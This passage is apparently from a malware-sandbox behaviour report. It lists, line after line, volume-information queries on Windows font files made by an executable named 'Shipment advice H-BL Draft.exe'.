                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
